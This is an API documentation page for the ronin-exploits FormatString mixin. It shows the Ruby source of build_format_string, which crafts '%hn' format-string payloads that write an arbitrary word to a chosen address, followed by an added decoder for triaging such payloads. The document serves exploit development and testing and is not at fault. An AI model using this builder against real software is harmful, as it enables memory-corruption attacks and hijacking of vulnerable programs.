Module: Ronin::Exploits::Mixins::FormatString

Includes:
Binary
Defined in:
lib/ronin/exploits/mixins/format_string.rb

Overview

Adds methods to exploits for generating format strings to be used in format string vulnerabilities.

Since:

  • 1.0.0

Instance Method Summary

Methods included from Binary

#pack, #perform_validate, #platform

Instance Method Details

#build_format_string(overwrite:, pop_length:, address:, payload:) ⇒ String

Builds a format string.

Parameters:

  • overwrite (Integer)

    The address to overwrite.

  • pop_length (Integer)

    The number of stack arguments to pop before the format string buffer itself is reached; used as the direct-parameter index `N` in the `%N$hn` writes.

  • address (Integer)

    The address to write.

  • payload (#to_s)

    The payload to append to the format string.

Returns:

  • (String)

    The built format string.

Since:

  • 1.0.0

# File 'lib/ronin/exploits/mixins/format_string.rb', line 55

def build_format_string(overwrite: , pop_length: , address: , payload: )
  machine_word = platform[:machine_word]
  half_bits    = (machine_word.size * 8) / 2

  # the two target addresses: the low half-word of `overwrite` and the high
  # half-word right after it (little-endian); they are also stack arguments
  # `pop_length` and `pop_length + 1` for the `%N$hn` writes below
  buffer = String.new(encoding: Encoding::ASCII_8BIT)
  buffer << pack(:machine_word,overwrite)
  buffer << pack(:machine_word,overwrite + (machine_word.size / 2))

  # masks selecting the low and high halves of `address`
  low_mask  = (1 << half_bits) - 1
  high_mask = low_mask << half_bits

  high = (address & high_mask) >> half_bits
  low  = address & low_mask

  # `%hn` stores printf's running character counter, so the halves are written
  # in ascending order: pad up to the smaller value (the packed addresses
  # already account for machine_word.size * 2 printed bytes), then pad the
  # difference up to the larger value
  if low < high
    first_pad  = low - (machine_word.size * 2)
    second_pad = high - low
    buffer << format("%%.%ud%%%u$hn%%.%ud%%%u$hn",first_pad,pop_length,second_pad,pop_length + 1)
  else
    first_pad  = high - (machine_word.size * 2)
    second_pad = low - high
    buffer << format("%%.%ud%%%u$hn%%.%ud%%%u$hn",first_pad,pop_length + 1,second_pad,pop_length)
  end

  buffer << payload.to_s
  return buffer
end
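As an added example (not part of ronin-exploits), the following decoder walks a captured payload of the shape build_format_string produces, tracks printf's character counter, and reports which address each `%N$hn` would hit and which half-word it would store; this is the check to run when triaging such an input or unit-testing the builder. The 32-bit little-endian sample payload and the `buffer_arg` parameter (the stack argument index at which the payload buffer starts, the page's `pop_length`) are assumptions.

```ruby
# Constructed sample: two little-endian 32-bit target addresses followed by two
# padded `%hn` writes, as the builder emits for overwrite 0x0804a010 with
# address 0x08049abc at stack argument 7 (high half first, since 0x0804 < 0x9abc).
SAMPLE_PAYLOAD = [0x0804a010, 0x0804a012].pack("V*") +
                 "%.2044d%8$hn%.37560d%7$hn"

# Replays the format string: returns { target_address => 16-bit value stored }.
# Assumes each `%.Nd` prints exactly N characters (the same assumption the
# builder makes) and that argument `buffer_arg` is the first word of the payload.
def decode_hn_writes(payload, buffer_arg:, word_size: 4)
  bytes   = payload.b
  counter = 0
  writes  = {}

  bytes.scan(/%\.(\d+)d|%(\d+)\$hn|(.)/m) do |pad, arg, literal|
    if pad
      counter += pad.to_i                          # padding directive
    elsif arg
      offset = (arg.to_i - buffer_arg) * word_size # where that argument lives
      target = bytes.byteslice(offset, word_size).unpack1("V")
      writes[target] = counter & 0xffff            # %hn stores the low 16 bits
    else
      counter += 1                                 # literal byte is echoed
    end
  end

  writes
end

# Reassembles the machine word the two half-word writes leave at `overwrite`.
def reconstruct_value(writes, overwrite)
  low  = writes.fetch(overwrite)
  high = writes.fetch(overwrite + 2)
  (high << 16) | low
end

if __FILE__ == $0
  writes = decode_hn_writes(SAMPLE_PAYLOAD, buffer_arg: 7)
  writes.each { |addr, val| puts format("0x%08x <- 0x%04x", addr, val) }
  puts format("value at 0x%08x: 0x%08x", 0x0804a010, reconstruct_value(writes, 0x0804a010))
end
```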